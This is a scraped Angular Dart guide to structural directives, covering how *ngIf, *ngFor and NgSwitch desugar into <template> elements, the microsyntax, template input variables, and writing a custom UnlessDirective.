*ngIfdirective moved to the <template>element where it became a property binding, [ngIf]. - The rest of the <div>, including its class attribute, moved inside the <template>element. None of these forms are actually rendered. Only the finished product ends up in the DOM. Angular consumed the <template> content during its actual rendering and replaced the <template> with a diagnostic comment. The NgFor and NgSwitch... directives follow the same pattern. Inside *ngForInside *ngFor Angular transforms the *ngFor in similar fashion from asterisk (*) syntax through template attribute to template element. Here’s a full-featured app of NgFor, written all three ways: This is manifestly more complicated than ngIf and rightly so. The NgFor directive has more features, both required and optional, than the NgIf shown in this guide. At minimum NgFor needs a looping variable ( let hero) and a list ( heroes). You enable these features in the string assigned to ngFor, which you write in Angular’s microsyntax. Everything outside the ngFor string stays with the host element (the <div>) as it moves inside the <template>. In this example, the [ngClass]="odd" stays on the <div>. MicrosyntaxMicrosyntax The Angular microsyntax lets you configure a directive in a compact, friendly string. The microsyntax parser translates that string into attributes on the <template>: The letkeyword declares a template input variable that you reference within the template. The input variables in this example are hero, i, and odd. The parser translates let hero, let i, and let oddinto variables named, let-hero, let-i, and let-odd. The microsyntax parser takes ofand trackby, title-cases them ( of-> Of, trackBy-> TrackBy), and prefixes them with the directive’s attribute name ( ngFor), yielding the names ngForOfand ngForTrackBy. Those are the names of two NgForinput properties . That’s how the directive learns that the list is heroesand the track-by function is trackById. As the NgFordirective loops through the list, it sets and resets properties of its own context object. These properties include indexand oddand a special property named $implicit. The let-iand let-oddvariables were defined as let i=indexand let odd=odd. Angular sets them to the current value of the context’s indexand oddproperties. The context property for let-herowasn’t specified. It’s intended source is implicit. Angular sets let-heroto the value of the context’s $implicitproperty which NgForhas initialized with the hero for the current iteration. The API guide describes additional NgFordirective properties and context properties. These microsyntax mechanisms are available to you when you write your own structural directives. Studying the source code for NgIf and NgFor is a great way to learn more. Template input variableTemplate input variable A template input variable is a variable whose value you can reference within a single instance of the template. There are several such variables in this example: hero, i, and odd. All are preceded by the keyword let. A template input variable is not the same as a template reference variable, neither semantically nor syntactically. You declare a template input variable using the let keyword ( let hero). The variable’s scope is limited to a single instance of the repeated template. You can use the same variable name again in the definition of other structural directives. You declare a template reference variable by prefixing the variable name with # ( #var). A reference variable refers to its attached element, component or directive. It can be accessed anywhere in the entire template. Template input and reference variable names have their own namespaces. The hero in let hero is never the same variable as the hero declared as #hero. One structural directive per host elementOne structural directive per host element Someday you’ll want to repeat a block of HTML but only when a particular condition is true. You’ll try to put both an *ngFor and an *ngIf on the same host element. Angular won’t let you. You may apply only one structural directive to an element. The reason is simplicity. Structural directives can do complex things with the host element and its descendents. When two directives lay claim to the same host element, which one takes precedence? Which should go first, the NgIf or the NgFor? Can the NgIf cancel the effect of the NgFor? If so (and it seems like it should be so), how should Angular generalize the ability to cancel for other structural directives? There are no easy answers to these questions. Prohibiting multiple structural directives makes them moot. There’s an easy solution for this use case: put the *ngIf on a container element that wraps the *ngFor element. One or both elements can be an template so you don’t have to introduce extra levels of HTML. Inside NgSwitch directivesInside NgSwitch directives The Angular NgSwitch is actually a set of cooperating directives: NgSwitch, NgSwitchCase, and NgSwitchDefault. Here’s an example. You might come across an NgSwitchWhen directive in older code. That is the deprecated name for NgSwitchCase. The switch value assigned to NgSwitch ( hero.emotion) determines which (if any) of the switch cases are displayed. NgSwitch itself is not a structural directive. It’s an attribute directive that controls the behavior of the other two switch directives. That’s why you write [ngSwitch], never *ngSwitch. NgSwitchCase and NgSwitchDefault are structural directives. You attach them to elements using the asterisk (*) prefix notation. An NgSwitchCase displays its host element when its value matches the switch value. The NgSwitchDefault displays its host element when no sibling NgSwitchCase matches the switch value. The element to which you apply a directive is its host element. The <happy-hero> is the host element for the happy *ngSwitchCase. The <unknown-hero> is the host element for the *ngSwitchDefault. As with other structural directives, the NgSwitchCase and NgSwitchDefault can be desugared into the template attribute form. That, in turn, can be desugared into the <template> element form. Prefer the asterisk (*) syntaxPrefer the asterisk (*) syntax The asterisk (*) syntax is more clear than the other desugared forms. While there’s rarely a good reason to apply a structural directive in template attribute or element form, it’s still important to know that Angular creates a <template> and to understand how it works. You’ll refer to the <template> when you write your own structural directive. The template elementThe template element The HTML 5 <template> is a formula for rendering HTML. It is never displayed directly. In fact, before rendering the view, Angular replaces the <template> and its contents with a comment. If there is no structural directive and you merely wrap some elements in a <template>, those elements disappear. That’s the fate of the middle “Hip!” in the phrase “Hip! Hip! Hooray!”. Angular erases the middle “Hip!”, leaving the cheer a bit less enthusiastic. A structural directive puts a <template> to work as you’ll see when you write your own structural directive. Group sibling elementsGroup sibling elements There’s often a root element that can and should host the structural directive. The list element ( <li>) is a typical host element of an NgFor repeater. When there isn’t a host element, you can usually wrap the content in a native HTML container element, such as a <div>, and attach the directive to that wrapper. Introducing another container element—typically a <span> or <div>—to group the elements under a single root is usually harmless. Usually … but not always. The grouping element may break the template appearance because CSS styles neither expect nor accommodate the new layout. For example, suppose you have the following paragraph layout. You also have a CSS style rule that happens to apply to a <span> within a <p>aragraph. The constructed paragraph renders strangely. The p span style, intended for use elsewhere, was inadvertently applied here. Another problem: some HTML elements require all immediate children to be of a specific type. For example, the <select> element requires <option> children. You can’t wrap the options in a conditional <div> or a <span>. When you try this, the drop down is empty. The browser won’t display an <option> within a <span>. template to the rescuetemplate to the rescue The Angular <template> is a grouping element that doesn’t interfere with styles or layout because Angular doesn’t put it in the DOM. Here’s the conditional paragraph again, this time using <template>. It renders properly. Notice the use of a desugared form of NgIf. Now conditionally exclude a select <option> with <template>. The drop down works properly. The <template> is a syntax element recognized by the Angular parser. It’s not a directive, component, class, or interface. It’s more like the curly braces in a Dart if-block: Without those braces, Dart would only execute the first statement when you intend to conditionally execute all of them as a single block. The <template> satisfies a similar need in Angular templates. Write a structural directiveWrite a structural directive In this section, you write an UnlessDirective structural directive that does the opposite of NgIf. NgIf displays the template content when the condition is true. UnlessDirective displays the content when the condition is false. Creating a directive is similar to creating a component. Here’s how you might begin: lib/src/unless_directive.dart (skeleton)lib/src/unless_directive.dart (skeleton) The directive’s selector is typically the directive’s attribute name in square brackets, [myUnless]. The brackets define a CSS attribute selector. The directive attribute name should be spelled in lowerCamelCase and begin with a prefix. Don’t use ng. That prefix belongs to Angular. Pick something short that fits you or your company. In this example, the prefix is my. The directive class name ends in Directive. Angular’s own directives do not. TemplateRef and ViewContainerRefTemplateRef and ViewContainerRef A simple structural directive like this one creates an embedded view from the Angular-generated <template> and inserts that view in a view container adjacent to the directive’s original <p> host element. You’ll acquire the <template> contents with a TemplateRef and access the view container through a ViewContainerRef. You inject both in the directive constructor as private variables of the class. The myUnless propertyThe myUnless property The directive consumer expects to bind a true/false condition to [myUnless]. That means the directive needs a myUnless property, decorated with @Input Read about @Input in the Template Syntax guide. Angular sets the myUnless property whenever the value of the condition changes. Because the myUnless property does work, it needs a setter. If the condition is false and the view hasn’t been created previously, tell the view container to create the embedded view from the template. If the condition is true and the view is currently displayed, clear the container which also destroys the view. Nobody reads the myUnless property so it doesn’t need a getter. The completed directive code looks like this: lib/src/unless_directive.dart (excerpt)lib/src/unless_directive.dart (excerpt) Add this directive to the directives list of the AppComponent. Then create some HTML to try it. When the condition is false, the top (A) paragraph appears and the bottom (B) paragraph disappears. When the condition is true, the top (A) paragraph is removed and the bottom (B) paragraph appears. SummarySummary You can both try and download the source code for this guide in the Here is the source under the lib folder. You learned - that structural directives manipulate HTML layout. - to use <template>as a grouping element when there is no suitable host element. - that the Angular desugars asterisk (*) syntax into a <template>. - how that works for the NgIf, NgForand NgSwitchbuilt-in directives. - about the microsyntax that expands into a <template>. - to write a custom structural directive, UnlessDirective.
https://webdev.dartlang.org/angular/guide/structural-directives
CC-MAIN-2018-26
refinedweb
2,787
58.69
If it possible to launch a launch file from python? Final update: The solution so far is modified from here with help from ufr3c_tjc. (Thank you loudly in my heart) So the original codes from the link above is erroneous and won't work. The main part is remained: class open_launch_file(): def __init__(self): rospy.init_node('tester', anonymous=True) rospy.on_shutdown(self.shutdown) uuid = roslaunch.rlutil.get_or_generate_uuid(None, False) roslaunch.configure_logging(uuid) launch = roslaunch.parent.ROSLaunchParent(uuid,["/path/to/your/launch/file"]) launch.start() def shutdown(self): rospy.loginfo("Stopping the robot...") destroy() #my own cleaning stuff function, you dont have to have it. but if there is anything you need to do before close the ros node, do it here. rospy.sleep(1) =============================================================================== I have a .launch file that basically just open the webcam. And I would like to call it from my python code when needed. I searched online and found something like this: I have test other normal commands like "ls -l", "echo Hello world". And they are working fine. However, it would not work with the launch file import subprocess p = subprocess.Popen(["roslaunch ~/path/to/cam.launch "],stdout=subprocess.PIPE,stderr = subprocess.PIPE,shell=True) print p.communicate() the error message is: '/bin/sh: 1: roslaunch: not found\n I am using python 2.7 update: the output of printenv | grep PY is: INSIDE_CAJA_PYTHON= PYTHONPATH=/opt/ros/kinetic/lib/python2.7/dist-packages When using the API example provide by ROS, there were errors that confuse me. I have set the environment correctly I believe. When I rosrun tester_pkg tester.py , it gives error NameError: name 'rospy' is not defined So I tried sudo python tester.py directly, it gives ImportError: No module named roslaunch Thank you all for the replying. I am new to ROS and really need some helps. update codes: tester.py #!/usr/bin/env python import roslaunch import rospy rospy.init_node('tester', anonymous=True) rospy.on_shutdown(self.shutdown) uuid = roslaunch.rlutil.get_or_generate_uuid(None, False) roslaunch.configure_logging(uuid) launch = roslaunch.parent.ROSLaunchParent(uuid,["/home/yue/catkin_ws/src/webcam_car/launch/cam.launch"]) launch.start() launch.shutdown() Don't use sudo. That will run it as root, which will never work unless ROS is installed as root. line 3: syntax error near unexpected tokenis telling you the issue. Look at line 3 of the file and see what could be wrong (or post the file for us to see). NameError: name 'rospy' is not defined Add import rospy Thank you! But now the error become the line 3 error is fixed by adding #!/usr/bin/env python. stupid missing. Can you edit the question with the file's code you are trying to run? That will make it much easier to help you. sure. It's basically the sample II from the roslaunch API page. The self.shutdownpart is weird. The selfkeyword is only used in a class context. Just remove that line completely. Also, this script will immediately start then shutdown the launch file, so maybe just remove the launch.shutdown()part until you decide how/when you want to shut it down. I found comment about the self.shutdown # Set rospy to exectute a shutdown function when terminating the script Remove this line and the launch.shutdown() works as I can see the process being created! But still the launch file shutdown itself. I guess I can take over from here now! Thank you so muc
https://answers.ros.org/question/263862/if-it-possible-to-launch-a-launch-file-from-python/?sort=oldest
CC-MAIN-2021-49
refinedweb
574
70.7
." edit The Beginning The term "Making Up Oscar Wilde Quotes" was coined by User:TheTris in an article posted at precisely 10:19, 7 March 2005: - It is easy to find Oscar Wilde quotes, largely due to the national sport of England, which is "Making Up Oscar Wilde Quotes". Indeed, "It's a sorry man who can not invent an Oscar Wilde quote to fit his situation" ~Oscar Wilde The article was Oscar Wilde, and the subject, Oscar Wilde, was destined to become known as the "Founder of Uncyclopedia." (No one knows why.) Only one day later, at 19:06 on 8 March 2005, User:129.44.34.173 posted this article, entitled Making up Oscar Wilde quotes: - "Making Up Oscar Wilde quotes is the noblest of all the arts" ~ Oscar Wilde - "A man who can not invent an Oscar Wilde quote is no man at all" ~ Oscar Wilde - Widely regarded as the best spectator sport ever invented, other than Sudden Death Twister. - "If you really think I said this, you're dumber than you look" ~ Oscar Wilde Amazingly, the link to "Sudden Death Twister," a three-line stub article posted by User:PantsMacKenzie which has been deleted at least once, has remained in place through over 1,200 edits. edit The Middle Once in place, these two articles ultimately became one of the most heavily read, edited, and vandalized articles in early Uncyclopedia history. (Again, no one knows why.) Other articles soon sprang up quoting other famous personages. Some of those articles thrived, while others withered and died.. edit Founding of Unquotable. edit Great Unquotable Cleanup of 2013 Activity in Unquotable declined after the initial burst of editing 2006, and the namespace laid mostly dormant for several years. Experienced writers eventually realized that pages of quotes were not funny. Although articles would get an occasional quote, bot edit, or even deletion, Unquotable was largely ignored until 2013. On February 17th, 2013, Mnbvcxz decided to nominate Unquotable:Charles Darwin for deletion. Some discussion arose over if UnQuotable even needed to have its own namespace, as there were only about 40 real articles in the userspace. The community ultimately decided against deleting the entire project. However, the discussion resulted in the Great Unquotable Cleanup of 2013. During the Great Unquotable Cleanup of 2013, almost all the Unquotable pages were purged of bad quotes, often reducing the article length by half or more. Additionally, several Unquotable pages were deleted or merged in the process of cleaning up Quotespace. Interestingly, very little, if any, new material was added to Unquotable during the cleanup. edit See Also ^ 1. For several weeks, the space was actually referred to as "QuoteUnquote." (No one knows why.)
http://uncyclopedia.wikia.com/wiki/Unquotable:History_of_Unquotable
CC-MAIN-2016-22
refinedweb
449
61.46
. In Python. It uses a lazy array with the sums of the consecutive elements, so that for the sorted array case we can search for the target. public class Main { public static void main(String args[]) { int target = 100; int[] numeros = {5, 26, 39, 47, 53, 38, 12, 23, 41, 39, 40, 16, 47, 13, 10, 18, 4, 22, 50}; } } Here’s a solution in C. The program takes a target value, followed by a u or s (to indicate sorted or unsorted), followed by an array of ints. The printed output shows the index of the first element of the pair of adjacent elements that sum to the specified target. If there is no such pair, the program prints -1. Example usage:
https://programmingpraxis.com/2020/01/10/consecutive-array-search/
CC-MAIN-2021-04
refinedweb
123
63.83
Opened 7 years ago Closed 7 years ago #12755 closed (wontfix) Proposal: Add a method to ModelAdmin to return the form instance Description Sometimes we need dynamic fields in a form, depending on the logged in user or something else. Currently the ModelAdmin class has a get_form() method, that returns a form class to be used in admin. But it would be nice to customize the form instantiation when we are building dynamic forms. I've attached a patch that adds a get_form_instance() method to ModelAdmin, and it receives the request object. This way we can pass extra parameters to our dynamic form based on some request attributes. For example: def get_form_instance(self, request, form_class, **kwargs): return form_classe(user=request.user, **kwargs) I don't think it breaks backwards compatibility and it's not a new feature, so probably could be added to 1.2. Attachments (1) Change History (4) Changed 7 years ago by igors comment:1 Changed 7 years ago by igors - Needs documentation unset - Needs tests unset - Patch needs improvement unset Actually it's not needed, not for this example. I could just use functools.partial() in get_form(), like: def get_form(self, request, obj=None, **kwargs): form_class = super(MyModelForm, self).get_form(request, obj=obj, **kwargs) return functools.partial(form_class, user=request.user) comment:2 Changed 7 years ago by ubernostrum - milestone 1.2 deleted This is a feature request, and feature proposal for 1.2 is over. If this ever happens (and I for one wouldn't bet on it), it'll be after 1.2. comment:3 Changed 7 years ago by Alex - Resolution set to wontfix - Status changed from new to closed Igors has pointed out this isn't necessary. Add get_form_instance() method to ModelAdmin
https://code.djangoproject.com/ticket/12755
CC-MAIN-2016-36
refinedweb
290
55.84
How to use C# FileStream Class The FileStream Class represents a File in the Computer. Use the FileStream class to read from, write to, open, and close files on a file system, as well as to manipulate other file related operating system handles including pipes, standard input, and standard output. FileStream allows to move data to and from the stream as arrays of bytes. We operate File using FileMode in FileStream Class Some of FileModes as Follows : FileMode.Create : Create a new file , if the file exist it will append to it FileMode.CreateNew : Create a new File , if the file exist , it throws exception FileMode.Open : Open an existing file How to create a file using C# FileStream Class? The following C# example shows , how to create and write in a file using FileStream. using System; using System.Windows.Forms; using System.IO; using System.Text; namespace WindowsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button1_Click(object sender, EventArgs e) { try { System.IO.FileStream wFile; byte[] byteData = null; byteData = Encoding.ASCII.GetBytes("FileStream Test"); wFile = new FileStream("c:\\streamtest.txt", FileMode.Append); wFile.Write(byteData, 0, byteData.Length); wFile.Close(); } catch (IOException ex) { MessageBox.Show(ex.ToString()); } } } } When we execute the above C# source code , it create a new File and write the content to the specified path . - How to use C# Directory Class - How to use C# File
http://csharp.net-informations.com/file/csharp-filestream-class.htm
CC-MAIN-2014-10
refinedweb
233
59.7
Are. you don't have permission to open (or write?) whatever file you are trying to work with. Try running the script as super user or change permissions on the directory where you are trying to read/write from You could use cwd parameter, to run scriptB in its directory: import os from subprocess import check_call check_call([scriptB], cwd=os.path.dirname(scriptB)) error means that the program is found by subprocess but the user running the "nessusscan.py" does not have permissions to run it. Check ownership of the nessus file and the permissions on it. child process flushes its output buffers on exit but the prints from the parent are still in the parent's buffer. The solution is to flush the parent buffers before running the child: print("Starting script...") sys.stdout.flush() build.run() Okay, after days I found the solution my self. Due to missconfiguration, my rails app was not running as www-data user. For testing purposes I added the ssh-key of the User which actually runs the script to my bitbucket repository and it worked. In script1.py place this: def main(): do something if __name__ == "__main__": main() In script2.py: import script1 if condition: script1.main() I know I have to do some kind of root thing? Indeed you do! If you are using linux, sudo is the idiomatic way to escalate your user's privilege. So instead invoke 'sudo dd if=/dev/sdb of=/dev/null' (for example). If your script must be noninteractive, consider adding something like admin ALL = NOPASSWD: ALL to your sudoers, or something similar. It seems like the ftp server allows anonymous access; You don't need pass username, password. FTP constructor accept hostname(or IP), not URL. import sys import os from ftplib import FTP ftp = FTP("ftpsite.com")("/ftp/site/directory/") listing = []("LIST", listing.append) words = listing[0].split(None, 8) filesize = int(words[4]) filename = words[-1].lstrip() class VerboseWriter: def __init__(self, lf, filesize): self.progress = 0 self.lf = lf self.filesize = filesize def write(self, data): self.lf.write(data) self.progress += len(data) sys.stdout.write(' {}/{} ({:.1%})'.format(self.progress, self.filesize, float(self.progress)/self.filesize)) sys.stdout.flush() #download the file wit Try changing the port to 8080. You didn't say which OS, but most UNIX derivatives will only allow root to listen on ports below 1,024 or 4,096 depending on the OS and its configuration. To answer your first question: yes, if the file is not there Python will create it. Secondly, the user (yourself) running the python script doesn't have write privileges to create a file in the directory. print os.path.dirname(sys.executable) is what you should use. When you click it it is probably running through python.exe so you are removing the extra char from the w..
http://www.w3hello.com/questions/When-attempting-run-a-python-script-from-within-another-python-script-I-get-39-permission-denied-39-
CC-MAIN-2018-17
refinedweb
479
59.9
Hi folks, Just resub'd after a long time to ask a question about binary/backwards compatibility. We got bitten when upgrading from 3.0.0 to 3.0.3 which we assumed would be binary compatible and so (after some testing to confirm it was) replaced our existing 3.0.0 install with the 3.0.3 one (because we're using hierarchical namespaces in Lmod it meant we avoided needed to recompile everything we'd already built over the last 12 months with 3.0.0). However, once we'd done that we heard from a user that their code would no longer run because it couldn't find libopen-pal.so.40 and saw that instead 3.0.3 had libopen-pal.so.42. Initially we thought this was some odd build system problem, but then on digging further we realised that they were linking against libraries that in turn were built against OpenMPI (HDF5) and that those had embedded the libopen-pal.so.40 names. Of course our testing hadn't found that because we weren't linking against anything like those for our MPI tests. :-( But I was really surprised to see that these version numbers were changing, I thought the idea was to keep things backwardly compatible within these series? Now fortunately our reason for doing the forced upgrade (we found our 3.0.0 didn't work with our upgrade to Slurm 18.08.3) was us missing one combination out of our testing whilst fault-finding and having gotten it going we've been able to drop back to the original 3.0.0 & fixed it for them. But is this something that you folks have come across before? All the best, Chris -- Christopher Samuel OzGrav Senior Data Science Support ARC Centre of Excellence for Gravitational Wave Discovery _______________________________________________ devel mailing list devel@lists.open-mpi.org
https://www.mail-archive.com/devel@lists.open-mpi.org/msg20818.html
CC-MAIN-2019-04
refinedweb
315
64.51
Hello folks, today I decided to update my 0.6something to CVS. The first thing I found was a bug ;-) The PSP Servlet engine writes a temp file in /tmp and later os.rename()s it to the actual servlet file. If /tmp and Webware are not on the same file system, this will fail. Of course I have no idea how long the bug is already there. The single line fix below provides a quick solution. Finding a perhaps more appropriate temp dir may be up to Chuck or Geoff or whoever maintains PSP. The diff is also attached. Thanks, Fionn --------8<----------------8<---------------8<---------------8<------- *** ServletWriter.py.orig Thu Feb 7 18:46:53 2002 --- ServletWriter.py Thu Feb 7 19:00:25 2002 *************** *** 33,52 **** --- 33,53 ---- ''' This file creates the servlet source code. Well, it writes it out to a file at least.''' TAB = '\t' SPACES = ' ' # 4 spaces EMPTY_STRING='' def __init__(self,ctxt): self._pyfilename = ctxt.getPythonFileName() + tempfile.tempdir = os.path.dirname(self._pyfilename) self._temp = tempfile.mktemp('tmp') self._filehandle = open(self._temp,'w+') self._tabcnt = 0 self._blockcount = 0 # a hack to handle nested blocks of python code self._indentSpaces = self.SPACES self._useTabs=1 self._useBraces=0 self._indent='\t' self._userIndent = self.EMPTY_STRING
http://sourceforge.net/mailarchive/message.php?msg_id=3314268
CC-MAIN-2013-48
refinedweb
210
69.38
Overview This example shows how to load a hip file from a Python shell and inspect its contents. This example loops through all the object in /obj and prints out the positions of each of the points in the object. Implementation hou.hipFile.load("file_to_load.hip") for object in hou.node("/obj").children(): print "Points in", object.path() for point in object.displayNode().geometry().points(): print point.position() print Running outside out Houdini You can run this example outside of Houdini or Hython (that is, in a standard Python environment) if you first add hou to the Python path and import it (note that this will still use a Houdini license). import sys, os # Adjust sys.path so it contains $HFS/houdini/pythonX.Xlibs. Then we can # safely import the hou module. Importing this module will bring a Houdini # session into the Python interpreter. sys.path.append( os.environ['HFS'] + "/houdini/python%d.%dlibs" % sys.version_info[:2] ) import hou If you want to use hou as part of a larger general Python application, and you want to take up a license for the minimum time possible, you can release the license when you're done with it using hou.releaseLicense(): # Release the Houdini Batch license. If this script accesses the hou # module again it will reacquire the license automatically. hou.releaseLicense()
http://www.sidefx.com/docs/houdini/hom/cb/hipfile.html
CC-MAIN-2019-13
refinedweb
221
57.47
This section provides you an example with code for renaming a column name in a database table. As we know that each table keeps contents in rows and column format. While making a table we specify the name of each column which we want to add in the table. But later it may be that we need to change the name of the particular column. So, please don't panic. Here at roseindia.net, we have the answer of each and every thing. Brief description of the program is given below: Description of program: Firstly this program establishes the connection by using the JDBC driver with the database. After establishing the connection we will give the table name, old column name which we want to rename, new column name and it's data type. After that you will see that the column name has been renamed. If column name gets renamed column then the message we displaying is "Query OK, n rows affected" and if any problem arises in the SQL statement then it shows "Wrong entry!". Description of code: ALTER TABLE table_name CHANGE old_col new_col data_type: This query is fired to change the specific column name. It takes appropriate arguments: table_name: This is a name of the table in which we have to change the column name. old_col: The old column name that you want to change. new_col: The new column name data_type: This is a data type of new column. Here is the code of program: import java.io.*; import java.sql.*; public class ChangeColumnName{ public static void main(String[] args) { System.out.println("Change column name in a database table old column name:"); String old_col = bf.readLine(); System.out.println("Enter new column:"); String new_col = bf.readLine(); System.out.println("Enter data type:"); String type = bf.readLine(); int n = st.executeUpdate ("ALTER TABLE "+table+" CHANGE "+old_col+" "+new_col+" "+type); System.out.println("Query OK, "+n+" rows affected"); } catch (SQLException s){ System.out.println("Wrong entry!"); } } catch (Exception e){ e.printStackTrace(); } } } Database Table: Student Output of program: After change the table will look like this Student Table If you enjoyed this post then why not add us on Google+? Add us to your Circles Liked it! Share this Tutorial Discuss: Change Column Name of a Table View All Comments Post your Comment
http://www.roseindia.net/jdbc/jdbc-mysql/ChangeColumnName.shtml
CC-MAIN-2015-06
refinedweb
383
66.54
Try it now and let us know what you think. Switch to the new look >> You can return to the original look by selecting English in the language selector above. Add Annotations and Metadata to Segments with the X-Ray SDK for Go You can record additional information about requests, the environment, or your application with annotations and metadata. You can add annotations and metadata to the segments that the X-Ray SDK creates, or to custom subsegments that you create. Annotations are key-value pairs with string, number, or Boolean values. Annotations are indexed for use with filter expressions. Use annotations to record data that you want to use to group traces in the console, or when calling the GetTraceSummaries API. Metadata are key-value pairs that can have values of any type, including objects and lists, but are not indexed for use with filter expressions. Use metadata to record additional data that you want stored in the trace but don't need to use with search. In addition to annotations and metadata, you can also record user ID strings on segments. User IDs are recorded in a separate field on segments and are indexed for use with search. Sections Recording Annotations with the X-Ray SDK for Go Use annotations to record information on segments that you want indexed for search. Annotation Requirements Keys – Up to 500 alphanumeric characters. No spaces or symbols except underscores. Values – Up to 1,000 Unicode characters. Entries – Up to 50 annotations per trace. To record annotations, call AddAnnotation with a string containing the metadata you want to associate with the segment. xray.AddAnnotation( key string, value interface{}) The SDK records annotations as key-value pairs in an annotations object in the segment document. Calling AddAnnotation twice with the same key overwrites previously recorded values on the same segment. To find traces that have annotations with specific values, use the annotations. keyword in a filter expression. key Recording Metadata with the X-Ray SDK for Go Use metadata to record information on segments that you don't need indexed for search. To record metadata, call AddMetadata with a string containing the metadata you want to associate with the segment. xray.AddMetadata( key string, value interface{}) Recording User IDs with the X-Ray SDK for Go Record user IDs on request segments to identify the user who sent the request. To record user IDs Get a reference to the current segment from AWSXRay. import ( "context" "github.com/aws/aws-xray-sdk-go/xray" ) mySegment := xray.GetSegment( context) Call setUserwith a String ID of the user who sent the request. mySegment.User = " U12345" To find traces for a user ID, use the user keyword in a filter expression.
https://docs.aws.amazon.com/xray/latest/devguide/xray-sdk-go-segment.html
CC-MAIN-2019-39
refinedweb
453
56.35
One of the most powerful part of Mad Level Manager is how it can manage level loading. You defined earlier your levels using the Configurator. Now you can take fully advantage of it. Common Workflow There is only one class that you need to know about: MadLevel (click to check out the detailed class documentation). This class is defined in MadLevelManager namespace so don’t forget to put this at the top of your C# file: using MadLevelManager; Let’s say that you’ve named your first level as First Level. Loading this level is quite straightforward: MadLevel.LoadLevelByName("First Level"); It will work but you need to know the level name here. If this is first level of type Level in your level configuration, then you can make it much better: MadLevel.LoadFirst(MadLevel.Type.Level); Now you don’t need to know the name of first level. This code will work in any projects with level configuration and with at least one level defined. How cool is that? Player has just finished his level and wants to go to the next one. No problem at all! MadLevel.LoadNext(MadLevel.Type.Level); LoadNext looks for next level with type Level and loads it. It is just that easy! But what if this is the last level of your game? Then you can do the following: if (MadLevel.HasNext(MadLevel.Type.Level)) { MadLevel.LoadNext(MadLevel.Type.Level); } else { MadLevel.LoadLevelByName("Game Finished"); } This code will check if there’s any other level that can be loaded. If not, Game Finished level is loaded which should be of type Other. In this way you complete setup of your level workflow! Going back Do you want to go back to the previous level? LoadNext() has its opposite: MadLevel.LoadPrevious(MadLevel.Type.Level); Maybe you want to restart your whole game? Then you want to load the very first level of any type that is defined in your configuration. Here’s how to do it: MadLevel.LoadFirst(); Which configuration is active? You can easily get the current configuration name: var configurationName = MadLevel.activeConfiguration.name; In this way you can change your game behavior in the runtime based on the configuration name. Let’s assume that you have two configurations named like this: - My Game - My Game Demo Now you can create a condition: var configurationName = MadLevel.activeConfiguration.name; if (configurationName.EndsWith("Demo")) { Debug.Log("This is a demo version"); } else { Debug.Log("This is a full version"); } More info You probably will be interested in looking at full MadLevel API and maybe MadLevelConfiguration API which is available as field MadLevel.activeConfiguration.
http://madlevelmanager.madpixelmachine.com/doc/latest/basics/level_workflow_api.html
CC-MAIN-2019-13
refinedweb
438
59.3
Zope is a web application server, similar in concept to proprietary products like Cold Fusion. However, it is free software that is available under the GPL-compatible Zope Public License, which is very similar to the BSD License. Zope was designed with the specific goals of creating a powerful, secure framework for the development of robust web-based services with a minimum of effort. However, Zope’s biggest distinguishing characteristic is how closely it models the language it is written in: Python. In fact, many of its features are directly derived from its underlying Python structure. Because of that, it’s difficult to truly understand or appreciate Zope without having a basic knowledge of Python. This article, the first in a two part series, is intended as a high-level introduction to the language. Next month’s instalment will build upon this by demonstrating practical examples of Zope code. Zope’s biggest distinguishing characteristic is how closely it models the language it is written in: Python Language features Although Python has been in use since the early 1990’s, it’s only become relatively popular in the last few years. Many programmers view it as the spiritual successor to Perl. That is, it’s an expressive, interpreted language that’s equally at home in small system scripts or much larger applications. However, it has the deserved reputation of usually being easier to read and maintain than the equivalent Perl code. Python also sports an excellent object oriented approach that’s much cleaner and more integral to the overall design than is Perl’s. Perhaps most important, though, is a belief by the core development team in doing things the right way. It was designed from the beginning with an emphasis on practical elegance—Python strives to allow programmers to easily express their ideas in intuitive ways. It was designed from the beginning with an emphasis on practical elegance—Python strives to allow programmers to easily express their ideas in intuitive ways Significant whitespace The first thing that everyone notices about Python is its use of significant whitespace. Rather than marking blocks of code with keywords such as “begin” and “end”, or curly brackets a la C, Python sets them apart with indentation. Frankly, a lot of programmers hate the idea when they first see it. If you’re one of them, don’t be discouraged; the feeling passes quickly. It enforces the style guidelines that most good programmers would be following anyway, and soon becomes quite natural. Python is flexible regarding the use of spaces versus tabs, as long as you consistently use the same kind and amount of whitespace to indent. Furthermore, almost all programming editors have Python modes that handle the details for you. The standard comparison of formatting between C and Python is the “factorial” function. In C, that could be written as: int factorial(int i) { if(i == 1) { return 1; } else { return i * factorial(i - 1); } } (or in one of many other common styles). A Python programmer would probably write something extremely similar to: def factorial(i): if i == 1: return i else: return i * factorial(i - 1) Except for the missing curly brackets, the formatting is almost identical between the two. Interactive development Python includes an interactive shell where you can experiment and test new code. Running the python command without any arguments will result in something like: Python 2.3.5 (#1, Apr 27 2005, 08:55:40) >>> At this point, you can enter Python commands directly to see their effect. If you’re working on a large project, you can load specific parts of it for manual testing without affecting other modules. It’s equally handy for verifying that short functions will work as expected before embedding them into a larger body of code. It’s difficult to convey exactly how convenient this is, and how efficient the code-experiment-code cycle can be. Finally, the interactive prompt is an excellent place to explore objects, and the data and functions inside them. Typing dir(someobject) will return the list of objects referenced by someobject, and most of the functions in Python’s core libraries contain a doc attribute with usage information: >>> dir(str) [lots of stuff, ..., 'translate', 'upper', 'zfill'] >>> print str.upper.__doc__ S.upper() -> string Return a copy of the string S converted to uppercase. Tiny core language Python 2.3.5, the version recommended for use with the latest production release of Zope, has just 29 reserved words. Perl has quite a few more: 206 as of version 5.6.8. PHP tips the scales with up to an incredible 3972 commands and functions in the base language (although many can be added and removed at compilation time). The practical upshot is that any experienced programmer should be able to memorize the entire language in an evening. This simplicity does not reflect a lack of power though. Although most of the familiar commands are similar to their counterparts in other languages, several are significantly more flexible. The for command, as an example, will cheerfully iterate across a set of numbers, a list of strings, or the keys of a dictionary object. Any experienced programmer should be able to memorize the entire language in an evening Python keywords The whole language is built upon a short list of words: and, del, for, is, raise, assert, elif, from, lambda, return, break, else, global, not, try, class, except, if, or, while, continue, exec, import, pass, yield, def, finally, in, and print. If you’ve ever written a program, you probably already have an accurate idea of what most of them do. Strong dynamic typing Python is dynamically typed, which means that it executes its type checks during program execution (as opposed to C). It is also strongly typed, meaning that it won’t convert data from one type to another unless you explicitly ask it to (as opposed to Perl). The language makes great use of this flexibility by passing parameters to functions as reference instead of by value. The net effect is that you can pass almost any object to a function, and if the operations in the function make sense for that type of object, then the function will work as expected. For example, the following code defines a function that will add any two compatible values together: >>>!
